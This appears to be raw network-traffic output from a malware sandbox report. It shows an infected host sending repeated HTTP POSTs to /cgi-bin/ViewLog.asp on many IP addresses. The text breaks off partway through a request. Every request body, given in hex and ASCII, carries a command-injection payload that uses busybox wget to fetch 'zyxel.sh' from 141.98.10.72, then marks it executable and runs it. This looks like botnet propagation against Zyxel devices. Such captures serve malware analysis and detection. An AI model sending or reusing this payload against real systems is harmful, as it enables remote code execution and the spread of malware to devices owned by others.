                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.794490099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:47.202440023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.114305973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:55.746150970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.009581089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1205192.168.2.144516094.126.14.268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.099786997 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.329732895 CET224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1206192.168.2.144798262.29.109.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.101206064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1207192.168.2.144516494.122.109.1478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.103610992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1208192.168.2.145256494.124.192.2458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.109683037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1209192.168.2.145324694.123.143.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.114573956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1210192.168.2.145262031.200.87.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.116246939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1211192.168.2.144022095.86.126.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.120461941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1212192.168.2.145531262.210.28.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.274339914 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.477119923 CET498INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:45 GMT
                                                        Server: Apache/2.4.57 (Debian)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1213192.168.2.144654431.136.57.1548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.280803919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.922430038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:47.170422077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:49.858465910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:54.978190899 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.961920023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1214192.168.2.143695885.208.51.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.282591105 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.494646072 CET498INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:45 GMT
                                                        Server: Apache/2.4.57 (Debian)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1215192.168.2.144027494.158.24.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.331557035 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.567527056 CET259INHTTP/1.1 501 Not Implemented
                                                        Connection: Keep-Alive
                                                        Content-Length: 121
                                                        Date: Wed, 14 Feb 2024 08:35:45 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1216192.168.2.145948294.122.232.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.346158981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1217192.168.2.144311894.121.199.338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.353008986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1218192.168.2.145803431.172.69.228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.395987988 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.521482944 CET184INHTTP/1.1 404 Not Found
                                                        Content-Encoding: gzip
                                                        Vary: Accept-Encoding
                                                        Date: Wed, 14 Feb 2024 08:35:45 GMT
                                                        Content-Length: 23
                                                        Connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1219192.168.2.146000262.176.122.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.563627005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
